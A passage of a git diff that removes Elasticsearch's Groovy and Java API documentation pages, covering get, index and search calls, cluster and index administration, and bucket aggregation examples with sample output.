/dev/null @@ -1,19 +0,0 @@ -[[get]] -== Get API - -The get API is very similar to the -// {javaclient}/java-docs-get.html[] -Java get API. The main benefit -of using groovy is handling the source content. 
It can be automatically -converted to a `Map` which means using Groovy to navigate it is simple: - -[source,groovy] --------------------------------------------------- -def getF = node.client.get { - index "test" - type "_doc" - id "1" -} - -println "Result of field2: $getF.response.source.complex.field2" --------------------------------------------------- diff --git a/docs/groovy-api/index.asciidoc b/docs/groovy-api/index.asciidoc deleted file mode 100644 index e1bb81856f1..00000000000 --- a/docs/groovy-api/index.asciidoc +++ /dev/null @@ -1,48 +0,0 @@ -= Groovy API - -include::../Versions.asciidoc[] - -[preface] -== Preface - -This section describes the http://groovy-lang.org/[Groovy] API -Elasticsearch provides. All Elasticsearch APIs are executed using a -<>, and are completely -asynchronous in nature (they either accept a listener, or return a -future). - -The Groovy API is a wrapper on top of the -{javaclient}[Java API] exposing it in a groovier -manner. The execution options for each API follow a similar manner and -covered in <>. - - -[[maven]] -=== Maven Repository - -The Groovy API is hosted on -http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22elasticsearch-groovy%22[Maven -Central]. - -For example, you can define the latest version in your `pom.xml` file: - -["source","xml",subs="attributes"] --------------------------------------------------- - - org.elasticsearch - elasticsearch-groovy - {version} - --------------------------------------------------- - -include::anatomy.asciidoc[] - -include::client.asciidoc[] - -include::index_.asciidoc[] - -include::get.asciidoc[] - -include::delete.asciidoc[] - -include::search.asciidoc[] diff --git a/docs/groovy-api/index_.asciidoc b/docs/groovy-api/index_.asciidoc deleted file mode 100644 index deefb30e031..00000000000 --- a/docs/groovy-api/index_.asciidoc +++ /dev/null @@ -1,32 +0,0 @@ -[[index_]] -== Index API - -The index API is very similar to the -// {javaclient}/java-docs-index.html[] -Java index API. The Groovy -extension to it is the ability to provide the indexed source using a -closure. For example: - -[source,groovy] --------------------------------------------------- -def indexR = client.index { - index "test" - type "_doc" - id "1" - source { - test = "value" - complex { - value1 = "value1" - value2 = "value2" - } - } -} --------------------------------------------------- - -In the above example, the source closure itself gets transformed into an -XContent (defaults to JSON). In order to change how the source closure -is serialized, a global (static) setting can be set on the `GClient` by -changing the `indexContentType` field. - -Note also that the `source` can be set using the typical Java based -APIs, the `Closure` option is a Groovy extension. diff --git a/docs/groovy-api/search.asciidoc b/docs/groovy-api/search.asciidoc deleted file mode 100644 index 7834e45abc8..00000000000 --- a/docs/groovy-api/search.asciidoc +++ /dev/null @@ -1,116 +0,0 @@ -[[search]] -== Search API - -The search API is very similar to the -// {javaclient}/java-search.html[] -Java search API. 
The Groovy -extension allows to provide the search source to execute as a `Closure` -including the query itself (similar to GORM criteria builder): - -[source,groovy] --------------------------------------------------- -def search = node.client.search { - indices "test" - types "_doc" - source { - query { - term(test: "value") - } - } -} - -search.response.hits.each {SearchHit hit -> - println "Got hit $hit.id from $hit.index/$hit.type" -} --------------------------------------------------- - -It can also be executed using the "Java API" while still using a closure -for the query: - -[source,groovy] --------------------------------------------------- -def search = node.client.prepareSearch("test").setQuery({ - term(test: "value") -}).gexecute(); - -search.response.hits.each {SearchHit hit -> - println "Got hit $hit.id from $hit.index/$hit.type" -} --------------------------------------------------- - -The format of the search `Closure` follows the same JSON syntax as the -{ref}/search-search.html[Search API] request. - - -[[more-examples]] -=== More examples - -Term query where multiple values are provided (see -{ref}/query-dsl-terms-query.html[terms]): - -[source,groovy] --------------------------------------------------- -def search = node.client.search { - indices "test" - types "_doc" - source { - query { - terms(test: ["value1", "value2"]) - } - } -} --------------------------------------------------- - -Query string (see -{ref}/query-dsl-query-string-query.html[query string]): - -[source,groovy] --------------------------------------------------- -def search = node.client.search { - indices "test" - types "_doc" - source { - query { - query_string( - fields: ["test"], - query: "value1 value2") - } - } -} --------------------------------------------------- - -Pagination (see -{ref}/search-request-from-size.html[from/size]): - -[source,groovy] --------------------------------------------------- -def search = node.client.search { - indices "test" - types "_doc" - source { - from = 0 - size = 10 - query { - term(test: "value") - } - } -} --------------------------------------------------- - -Sorting (see {ref}/search-request-sort.html[sort]): - -[source,groovy] --------------------------------------------------- -def search = node.client.search { - indices "test" - types "_doc" - source { - query { - term(test: "value") - } - sort = [ - date : [ order: "desc"] - ] - } -} --------------------------------------------------- diff --git a/docs/java-api/admin/cluster/health.asciidoc b/docs/java-api/admin/cluster/health.asciidoc deleted file mode 100644 index 615a011cf72..00000000000 --- a/docs/java-api/admin/cluster/health.asciidoc +++ /dev/null @@ -1,76 +0,0 @@ -[[java-admin-cluster-health]] -==== Cluster Health - -[[java-admin-cluster-health-health]] -===== Health - -The cluster health API allows to get a very simple status on the health of the cluster and also can give you -some technical information about the cluster status per index: - -[source,java] --------------------------------------------------- -ClusterHealthResponse healths = client.admin().cluster().prepareHealth().get(); <1> -String clusterName = healths.getClusterName(); <2> -int numberOfDataNodes = healths.getNumberOfDataNodes(); <3> -int numberOfNodes = healths.getNumberOfNodes(); <4> - -for (ClusterIndexHealth health : healths.getIndices().values()) { <5> - String index = health.getIndex(); <6> - int numberOfShards = health.getNumberOfShards(); <7> - int numberOfReplicas = health.getNumberOfReplicas(); <8> - 
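    // the per-index status read next is derived from shard allocation:
    // GREEN (all shards assigned), YELLOW (all primaries assigned), RED (at least one primary unassigned)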
ClusterHealthStatus status = health.getStatus(); <9> -} --------------------------------------------------- -<1> Get information for all indices -<2> Access the cluster name -<3> Get the total number of data nodes -<4> Get the total number of nodes -<5> Iterate over all indices -<6> Index name -<7> Number of shards -<8> Number of replicas -<9> Index status - -[[java-admin-cluster-health-wait-status]] -===== Wait for status - -You can use the cluster health API to wait for a specific status for the whole cluster or for a given index: - -[source,java] --------------------------------------------------- -client.admin().cluster().prepareHealth() <1> - .setWaitForYellowStatus() <2> - .get(); -client.admin().cluster().prepareHealth("company") <3> - .setWaitForGreenStatus() <4> - .get(); - -client.admin().cluster().prepareHealth("employee") <5> - .setWaitForGreenStatus() <6> - .setTimeout(TimeValue.timeValueSeconds(2)) <7> - .get(); --------------------------------------------------- -<1> Prepare a health request -<2> Wait for the cluster being yellow -<3> Prepare the health request for index `company` -<4> Wait for the index being green -<5> Prepare the health request for index `employee` -<6> Wait for the index being green -<7> Wait at most for 2 seconds - -If the index does not have the expected status and you want to fail in that case, you need -to explicitly interpret the result: - -[source,java] --------------------------------------------------- -ClusterHealthResponse response = client.admin().cluster().prepareHealth("company") - .setWaitForGreenStatus() <1> - .get(); - -ClusterHealthStatus status = response.getIndices().get("company").getStatus(); -if (!status.equals(ClusterHealthStatus.GREEN)) { - throw new RuntimeException("Index is in " + status + " state"); <2> -} --------------------------------------------------- -<1> Wait for the index being green -<2> Throw an exception if not `GREEN` diff --git a/docs/java-api/admin/cluster/index.asciidoc b/docs/java-api/admin/cluster/index.asciidoc deleted file mode 100644 index 4e1850a34fe..00000000000 --- a/docs/java-api/admin/cluster/index.asciidoc +++ /dev/null @@ -1,16 +0,0 @@ -[[java-admin-cluster]] -=== Cluster Administration - -To access cluster Java API, you need to call `cluster()` method from an <>: - -[source,java] --------------------------------------------------- -ClusterAdminClient clusterAdminClient = client.admin().cluster(); --------------------------------------------------- - -[NOTE] -In the rest of this guide, we will use `client.admin().cluster()`. - -include::health.asciidoc[] - -include::stored-scripts.asciidoc[] diff --git a/docs/java-api/admin/cluster/stored-scripts.asciidoc b/docs/java-api/admin/cluster/stored-scripts.asciidoc deleted file mode 100644 index 5ebf89e92be..00000000000 --- a/docs/java-api/admin/cluster/stored-scripts.asciidoc +++ /dev/null @@ -1,29 +0,0 @@ -[[stored-scripts]] -==== Stored Scripts API - -The stored script API allows one to interact with scripts and templates -stored in Elasticsearch. It can be used to create, update, get, -and delete stored scripts and templates. 
- -[source,java] --------------------------------------------------- -PutStoredScriptResponse response = client.admin().cluster().preparePutStoredScript() - .setId("script1") - .setContent(new BytesArray("{\"script\": {\"lang\": \"painless\", \"source\": \"_score * doc['my_numeric_field'].value\"} }"), XContentType.JSON) - .get(); - -GetStoredScriptResponse response = client().admin().cluster().prepareGetStoredScript() - .setId("script1") - .get(); - -DeleteStoredScriptResponse response = client().admin().cluster().prepareDeleteStoredScript() - .setId("script1") - .get(); --------------------------------------------------- - -To store templates simply use "mustache" for the scriptLang. - -===== Script Language - -The put stored script API allows one to set the language of the stored script. -If one is not provided the default scripting language will be used. diff --git a/docs/java-api/admin/index.asciidoc b/docs/java-api/admin/index.asciidoc deleted file mode 100644 index 41599a82c7b..00000000000 --- a/docs/java-api/admin/index.asciidoc +++ /dev/null @@ -1,18 +0,0 @@ -[[java-admin]] -== Java API Administration - -Elasticsearch provides a full Java API to deal with administration tasks. - -To access them, you need to call `admin()` method from a client to get an `AdminClient`: - -[source,java] --------------------------------------------------- -AdminClient adminClient = client.admin(); --------------------------------------------------- - -[NOTE] -In the rest of this guide, we will use `client.admin()`. - -include::indices/index.asciidoc[] - -include::cluster/index.asciidoc[] diff --git a/docs/java-api/admin/indices/create-index.asciidoc b/docs/java-api/admin/indices/create-index.asciidoc deleted file mode 100644 index c04b3c8ef4f..00000000000 --- a/docs/java-api/admin/indices/create-index.asciidoc +++ /dev/null @@ -1,28 +0,0 @@ -[[java-admin-indices-create-index]] -==== Create Index - -Using an <>, you can create an index with all default settings and no mapping: - -[source,java] --------------------------------------------------- -client.admin().indices().prepareCreate("twitter").get(); --------------------------------------------------- - -[discrete] -[[java-admin-indices-create-index-settings]] -===== Index Settings - -Each index created can have specific settings associated with it. 
- -[source,java] --------------------------------------------------- -client.admin().indices().prepareCreate("twitter") - .setSettings(Settings.builder() <1> - .put("index.number_of_shards", 3) - .put("index.number_of_replicas", 2) - ) - .get(); <2> --------------------------------------------------- -<1> Settings for this index -<2> Execute the action and wait for the result - diff --git a/docs/java-api/admin/indices/get-settings.asciidoc b/docs/java-api/admin/indices/get-settings.asciidoc deleted file mode 100644 index 844aaf65ec9..00000000000 --- a/docs/java-api/admin/indices/get-settings.asciidoc +++ /dev/null @@ -1,22 +0,0 @@ -[[java-admin-indices-get-settings]] -==== Get Settings - -The get settings API allows to retrieve settings of index/indices: - -[source,java] --------------------------------------------------- -GetSettingsResponse response = client.admin().indices() - .prepareGetSettings("company", "employee").get(); <1> -for (ObjectObjectCursor cursor : response.getIndexToSettings()) { <2> - String index = cursor.key; <3> - Settings settings = cursor.value; <4> - Integer shards = settings.getAsInt("index.number_of_shards", null); <5> - Integer replicas = settings.getAsInt("index.number_of_replicas", null); <6> -} --------------------------------------------------- -<1> Get settings for indices `company` and `employee` -<2> Iterate over results -<3> Index name -<4> Settings for the given index -<5> Number of shards for this index -<6> Number of replicas for this index diff --git a/docs/java-api/admin/indices/index.asciidoc b/docs/java-api/admin/indices/index.asciidoc deleted file mode 100644 index bbd365076c7..00000000000 --- a/docs/java-api/admin/indices/index.asciidoc +++ /dev/null @@ -1,21 +0,0 @@ -[[java-admin-indices]] -=== Indices Administration - -To access indices Java API, you need to call `indices()` method from an <>: - -[source,java] --------------------------------------------------- -IndicesAdminClient indicesAdminClient = client.admin().indices(); --------------------------------------------------- - -[NOTE] -In the rest of this guide, we will use `client.admin().indices()`. - -include::create-index.asciidoc[] - -include::put-mapping.asciidoc[] - -include::refresh.asciidoc[] - -include::get-settings.asciidoc[] -include::update-settings.asciidoc[] diff --git a/docs/java-api/admin/indices/put-mapping.asciidoc b/docs/java-api/admin/indices/put-mapping.asciidoc deleted file mode 100644 index 4c14310f6dc..00000000000 --- a/docs/java-api/admin/indices/put-mapping.asciidoc +++ /dev/null @@ -1,30 +0,0 @@ -[[java-admin-indices-put-mapping]] - -==== Put Mapping - -You can add mappings at index creation time: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{client-tests}/IndicesDocumentationIT.java[index-with-mapping] --------------------------------------------------- -<1> <> called `twitter` -<2> Add a `_doc` type with a field called `message` that has the data type `text`. - -There are several variants of the above `addMapping` method, some taking an -`XContentBuilder` or a `Map` with the mapping definition as arguments. Make sure -to check the javadocs to pick the simplest one for your use case. - -The PUT mapping API also allows for updating the mapping after index -creation. 
In this case you can provide the mapping as a String similar -to the REST API syntax: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{client-tests}/IndicesDocumentationIT.java[putMapping-request-source] --------------------------------------------------- -<1> Puts a mapping on existing index called `twitter` -<2> Adds a new field `name` to the mapping -<3> The type can be also provided within the source - -:base-dir!: diff --git a/docs/java-api/admin/indices/refresh.asciidoc b/docs/java-api/admin/indices/refresh.asciidoc deleted file mode 100644 index 856c270daf3..00000000000 --- a/docs/java-api/admin/indices/refresh.asciidoc +++ /dev/null @@ -1,19 +0,0 @@ -[[java-admin-indices-refresh]] -==== Refresh - -The refresh API allows to explicitly refresh one or more index: - -[source,java] --------------------------------------------------- -client.admin().indices().prepareRefresh().get(); <1> -client.admin().indices() - .prepareRefresh("twitter") <2> - .get(); -client.admin().indices() - .prepareRefresh("twitter", "company") <3> - .get(); --------------------------------------------------- -<1> Refresh all indices -<2> Refresh one index -<3> Refresh many indices - diff --git a/docs/java-api/admin/indices/update-settings.asciidoc b/docs/java-api/admin/indices/update-settings.asciidoc deleted file mode 100644 index 9c2cba2adf0..00000000000 --- a/docs/java-api/admin/indices/update-settings.asciidoc +++ /dev/null @@ -1,16 +0,0 @@ -[[java-admin-indices-update-settings]] -==== Update Indices Settings - -You can change index settings by calling: - -[source,java] --------------------------------------------------- -client.admin().indices().prepareUpdateSettings("twitter") <1> - .setSettings(Settings.builder() <2> - .put("index.number_of_replicas", 0) - ) - .get(); --------------------------------------------------- -<1> Index to update -<2> Settings - diff --git a/docs/java-api/aggregations/bucket.asciidoc b/docs/java-api/aggregations/bucket.asciidoc deleted file mode 100644 index fe2e0ea9be3..00000000000 --- a/docs/java-api/aggregations/bucket.asciidoc +++ /dev/null @@ -1,33 +0,0 @@ -[[java-aggregations-bucket]] - -include::bucket/global-aggregation.asciidoc[] - -include::bucket/filter-aggregation.asciidoc[] - -include::bucket/filters-aggregation.asciidoc[] - -include::bucket/missing-aggregation.asciidoc[] - -include::bucket/nested-aggregation.asciidoc[] - -include::bucket/reverse-nested-aggregation.asciidoc[] - -include::bucket/children-aggregation.asciidoc[] - -include::bucket/terms-aggregation.asciidoc[] - -include::bucket/significantterms-aggregation.asciidoc[] - -include::bucket/range-aggregation.asciidoc[] - -include::bucket/daterange-aggregation.asciidoc[] - -include::bucket/iprange-aggregation.asciidoc[] - -include::bucket/histogram-aggregation.asciidoc[] - -include::bucket/datehistogram-aggregation.asciidoc[] - -include::bucket/geodistance-aggregation.asciidoc[] - -include::bucket/geohashgrid-aggregation.asciidoc[] diff --git a/docs/java-api/aggregations/bucket/children-aggregation.asciidoc b/docs/java-api/aggregations/bucket/children-aggregation.asciidoc deleted file mode 100644 index f6a23fdafe9..00000000000 --- a/docs/java-api/aggregations/bucket/children-aggregation.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ -[[java-aggs-bucket-children]] -==== Children Aggregation - -Here is how you can use -{ref}/search-aggregations-bucket-children-aggregation.html[Children Aggregation] -with Java API. 
- - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AggregationBuilder aggregation = - AggregationBuilders - .children("agg", "reseller"); <1> --------------------------------------------------- -1. `"agg"` is the name of the aggregation and `"reseller"` is the child type - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.join.aggregations.Children; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Children agg = sr.getAggregations().get("agg"); -agg.getDocCount(); // Doc count --------------------------------------------------- diff --git a/docs/java-api/aggregations/bucket/datehistogram-aggregation.asciidoc b/docs/java-api/aggregations/bucket/datehistogram-aggregation.asciidoc deleted file mode 100644 index 610262b046c..00000000000 --- a/docs/java-api/aggregations/bucket/datehistogram-aggregation.asciidoc +++ /dev/null @@ -1,73 +0,0 @@ -[[java-aggs-bucket-datehistogram]] -==== Date Histogram Aggregation - -Here is how you can use -{ref}/search-aggregations-bucket-datehistogram-aggregation.html[Date Histogram Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AggregationBuilder aggregation = - AggregationBuilders - .dateHistogram("agg") - .field("dateOfBirth") - .calendarInterval(DateHistogramInterval.YEAR); --------------------------------------------------- - -Or if you want to set an interval of 10 days: - -[source,java] --------------------------------------------------- -AggregationBuilder aggregation = - AggregationBuilders - .dateHistogram("agg") - .field("dateOfBirth") - .fixedInterval(DateHistogramInterval.days(10)); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.bucket.histogram.Histogram; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Histogram agg = sr.getAggregations().get("agg"); - -// For each entry -for (Histogram.Bucket entry : agg.getBuckets()) { - DateTime key = (DateTime) entry.getKey(); // Key - String keyAsString = entry.getKeyAsString(); // Key as String - long docCount = entry.getDocCount(); // Doc count - - logger.info("key [{}], date [{}], doc_count [{}]", keyAsString, key.getYear(), docCount); -} --------------------------------------------------- - -This will basically produce for the first example: - -[source,text] --------------------------------------------------- -key [1942-01-01T00:00:00.000Z], date [1942], doc_count [1] -key [1945-01-01T00:00:00.000Z], date [1945], doc_count [1] -key [1946-01-01T00:00:00.000Z], date [1946], doc_count [1] -... -key [2005-01-01T00:00:00.000Z], date [2005], doc_count [1] -key [2007-01-01T00:00:00.000Z], date [2007], doc_count [2] -key [2008-01-01T00:00:00.000Z], date [2008], doc_count [3] --------------------------------------------------- - -===== Order - -Supports the same order functionality as the <>. 
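For example, a minimal sketch of ordering the yearly buckets by descending document count, assuming the `org.elasticsearch.search.aggregations.BucketOrder` helper shown later in the terms aggregation section also applies to date histograms:

[source,java]
--------------------------------------------------
AggregationBuilder aggregation =
    AggregationBuilders
        .dateHistogram("agg")
        .field("dateOfBirth")
        .calendarInterval(DateHistogramInterval.YEAR)
        .order(BucketOrder.count(false)); // most populated years first
--------------------------------------------------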
diff --git a/docs/java-api/aggregations/bucket/daterange-aggregation.asciidoc b/docs/java-api/aggregations/bucket/daterange-aggregation.asciidoc deleted file mode 100644 index fa8f31e8cd0..00000000000 --- a/docs/java-api/aggregations/bucket/daterange-aggregation.asciidoc +++ /dev/null @@ -1,59 +0,0 @@ -[[java-aggs-bucket-daterange]] -==== Date Range Aggregation - -Here is how you can use -{ref}/search-aggregations-bucket-daterange-aggregation.html[Date Range Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AggregationBuilder aggregation = - AggregationBuilders - .dateRange("agg") - .field("dateOfBirth") - .format("yyyy") - .addUnboundedTo("1950") // from -infinity to 1950 (excluded) - .addRange("1950", "1960") // from 1950 to 1960 (excluded) - .addUnboundedFrom("1960"); // from 1960 to +infinity --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.bucket.range.Range; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Range agg = sr.getAggregations().get("agg"); - -// For each entry -for (Range.Bucket entry : agg.getBuckets()) { - String key = entry.getKeyAsString(); // Date range as key - DateTime fromAsDate = (DateTime) entry.getFrom(); // Date bucket from as a Date - DateTime toAsDate = (DateTime) entry.getTo(); // Date bucket to as a Date - long docCount = entry.getDocCount(); // Doc count - - logger.info("key [{}], from [{}], to [{}], doc_count [{}]", key, fromAsDate, toAsDate, docCount); -} --------------------------------------------------- - -This will basically produce: - -[source,text] --------------------------------------------------- -key [*-1950], from [null], to [1950-01-01T00:00:00.000Z], doc_count [8] -key [1950-1960], from [1950-01-01T00:00:00.000Z], to [1960-01-01T00:00:00.000Z], doc_count [5] -key [1960-*], from [1960-01-01T00:00:00.000Z], to [null], doc_count [37] --------------------------------------------------- - diff --git a/docs/java-api/aggregations/bucket/filter-aggregation.asciidoc b/docs/java-api/aggregations/bucket/filter-aggregation.asciidoc deleted file mode 100644 index 3ffb05202bb..00000000000 --- a/docs/java-api/aggregations/bucket/filter-aggregation.asciidoc +++ /dev/null @@ -1,34 +0,0 @@ -[[java-aggs-bucket-filter]] -==== Filter Aggregation - -Here is how you can use -{ref}/search-aggregations-bucket-filter-aggregation.html[Filter Aggregation] -with Java API. 
- - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AggregationBuilders - .filter("agg", QueryBuilders.termQuery("gender", "male")); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.bucket.filter.Filter; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Filter agg = sr.getAggregations().get("agg"); -agg.getDocCount(); // Doc count --------------------------------------------------- diff --git a/docs/java-api/aggregations/bucket/filters-aggregation.asciidoc b/docs/java-api/aggregations/bucket/filters-aggregation.asciidoc deleted file mode 100644 index 0b782304dac..00000000000 --- a/docs/java-api/aggregations/bucket/filters-aggregation.asciidoc +++ /dev/null @@ -1,51 +0,0 @@ -[[java-aggs-bucket-filters]] -==== Filters Aggregation - -Here is how you can use -{ref}/search-aggregations-bucket-filters-aggregation.html[Filters Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AggregationBuilder aggregation = - AggregationBuilders - .filters("agg", - new FiltersAggregator.KeyedFilter("men", QueryBuilders.termQuery("gender", "male")), - new FiltersAggregator.KeyedFilter("women", QueryBuilders.termQuery("gender", "female"))); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.bucket.filters.Filters; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Filters agg = sr.getAggregations().get("agg"); - -// For each entry -for (Filters.Bucket entry : agg.getBuckets()) { - String key = entry.getKeyAsString(); // bucket key - long docCount = entry.getDocCount(); // Doc count - logger.info("key [{}], doc_count [{}]", key, docCount); -} --------------------------------------------------- - -This will basically produce: - -[source,text] --------------------------------------------------- -key [men], doc_count [4982] -key [women], doc_count [5018] --------------------------------------------------- diff --git a/docs/java-api/aggregations/bucket/geodistance-aggregation.asciidoc b/docs/java-api/aggregations/bucket/geodistance-aggregation.asciidoc deleted file mode 100644 index 472c3ac59bf..00000000000 --- a/docs/java-api/aggregations/bucket/geodistance-aggregation.asciidoc +++ /dev/null @@ -1,58 +0,0 @@ -[[java-aggs-bucket-geodistance]] -==== Geo Distance Aggregation - -Here is how you can use -{ref}/search-aggregations-bucket-geodistance-aggregation.html[Geo Distance Aggregation] -with Java API. 
- - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AggregationBuilder aggregation = - AggregationBuilders - .geoDistance("agg", new GeoPoint(48.84237171118314,2.33320027692004)) - .field("address.location") - .unit(DistanceUnit.KILOMETERS) - .addUnboundedTo(3.0) - .addRange(3.0, 10.0) - .addRange(10.0, 500.0); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.bucket.range.Range; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Range agg = sr.getAggregations().get("agg"); - -// For each entry -for (Range.Bucket entry : agg.getBuckets()) { - String key = entry.getKeyAsString(); // key as String - Number from = (Number) entry.getFrom(); // bucket from value - Number to = (Number) entry.getTo(); // bucket to value - long docCount = entry.getDocCount(); // Doc count - - logger.info("key [{}], from [{}], to [{}], doc_count [{}]", key, from, to, docCount); -} --------------------------------------------------- - -This will basically produce: - -[source,text] --------------------------------------------------- -key [*-3.0], from [0.0], to [3.0], doc_count [161] -key [3.0-10.0], from [3.0], to [10.0], doc_count [460] -key [10.0-500.0], from [10.0], to [500.0], doc_count [4925] --------------------------------------------------- diff --git a/docs/java-api/aggregations/bucket/geohashgrid-aggregation.asciidoc b/docs/java-api/aggregations/bucket/geohashgrid-aggregation.asciidoc deleted file mode 100644 index 19e3f033493..00000000000 --- a/docs/java-api/aggregations/bucket/geohashgrid-aggregation.asciidoc +++ /dev/null @@ -1,57 +0,0 @@ -[[java-aggs-bucket-geohashgrid]] -==== Geo Hash Grid Aggregation - -Here is how you can use -{ref}/search-aggregations-bucket-geohashgrid-aggregation.html[Geo Hash Grid Aggregation] -with Java API. 
- - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AggregationBuilder aggregation = - AggregationBuilders - .geohashGrid("agg") - .field("address.location") - .precision(4); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.bucket.geogrid.GeoHashGrid; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -GeoHashGrid agg = sr.getAggregations().get("agg"); - -// For each entry -for (GeoHashGrid.Bucket entry : agg.getBuckets()) { - String keyAsString = entry.getKeyAsString(); // key as String - GeoPoint key = (GeoPoint) entry.getKey(); // key as geo point - long docCount = entry.getDocCount(); // Doc count - - logger.info("key [{}], point {}, doc_count [{}]", keyAsString, key, docCount); -} --------------------------------------------------- - -This will basically produce: - -[source,text] --------------------------------------------------- -key [gbqu], point [47.197265625, -1.58203125], doc_count [1282] -key [gbvn], point [50.361328125, -4.04296875], doc_count [1248] -key [u1j0], point [50.712890625, 7.20703125], doc_count [1156] -key [u0j2], point [45.087890625, 7.55859375], doc_count [1138] -... --------------------------------------------------- - diff --git a/docs/java-api/aggregations/bucket/global-aggregation.asciidoc b/docs/java-api/aggregations/bucket/global-aggregation.asciidoc deleted file mode 100644 index e0a731159ad..00000000000 --- a/docs/java-api/aggregations/bucket/global-aggregation.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ -[[java-aggs-bucket-global]] -==== Global Aggregation - -Here is how you can use -{ref}/search-aggregations-bucket-global-aggregation.html[Global Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AggregationBuilders - .global("agg") - .subAggregation(AggregationBuilders.terms("genders").field("gender")); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.bucket.global.Global; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Global agg = sr.getAggregations().get("agg"); -agg.getDocCount(); // Doc count --------------------------------------------------- diff --git a/docs/java-api/aggregations/bucket/histogram-aggregation.asciidoc b/docs/java-api/aggregations/bucket/histogram-aggregation.asciidoc deleted file mode 100644 index 59bb555401c..00000000000 --- a/docs/java-api/aggregations/bucket/histogram-aggregation.asciidoc +++ /dev/null @@ -1,48 +0,0 @@ -[[java-aggs-bucket-histogram]] -==== Histogram Aggregation - -Here is how you can use -{ref}/search-aggregations-bucket-histogram-aggregation.html[Histogram Aggregation] -with Java API. 
- - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AggregationBuilder aggregation = - AggregationBuilders - .histogram("agg") - .field("height") - .interval(1); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.bucket.histogram.Histogram; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Histogram agg = sr.getAggregations().get("agg"); - -// For each entry -for (Histogram.Bucket entry : agg.getBuckets()) { - Number key = (Number) entry.getKey(); // Key - long docCount = entry.getDocCount(); // Doc count - - logger.info("key [{}], doc_count [{}]", key, docCount); -} --------------------------------------------------- - -===== Order - -Supports the same order functionality as the <>. diff --git a/docs/java-api/aggregations/bucket/iprange-aggregation.asciidoc b/docs/java-api/aggregations/bucket/iprange-aggregation.asciidoc deleted file mode 100644 index a2c07df1b26..00000000000 --- a/docs/java-api/aggregations/bucket/iprange-aggregation.asciidoc +++ /dev/null @@ -1,79 +0,0 @@ -[[java-aggs-bucket-iprange]] -==== Ip Range Aggregation - -Here is how you can use -{ref}/search-aggregations-bucket-iprange-aggregation.html[Ip Range Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AggregationBuilder aggregation = - AggregationBuilders - .ipRange("agg") - .field("ip") - .addUnboundedTo("192.168.1.0") // from -infinity to 192.168.1.0 (excluded) - .addRange("192.168.1.0", "192.168.2.0") // from 192.168.1.0 to 192.168.2.0 (excluded) - .addUnboundedFrom("192.168.2.0"); // from 192.168.2.0 to +infinity --------------------------------------------------- - -Note that you could also use ip masks as ranges: - -[source,java] --------------------------------------------------- -AggregationBuilder aggregation = - AggregationBuilders - .ipRange("agg") - .field("ip") - .addMaskRange("192.168.0.0/32") - .addMaskRange("192.168.0.0/24") - .addMaskRange("192.168.0.0/16"); --------------------------------------------------- - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.bucket.range.Range; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Range agg = sr.getAggregations().get("agg"); - -// For each entry -for (Range.Bucket entry : agg.getBuckets()) { - String key = entry.getKeyAsString(); // Ip range as key - String fromAsString = entry.getFromAsString(); // Ip bucket from as a String - String toAsString = entry.getToAsString(); // Ip bucket to as a String - long docCount = entry.getDocCount(); // Doc count - - logger.info("key [{}], from [{}], to [{}], doc_count [{}]", key, fromAsString, toAsString, docCount); -} --------------------------------------------------- - -This will basically produce for the first example: - -[source,text] 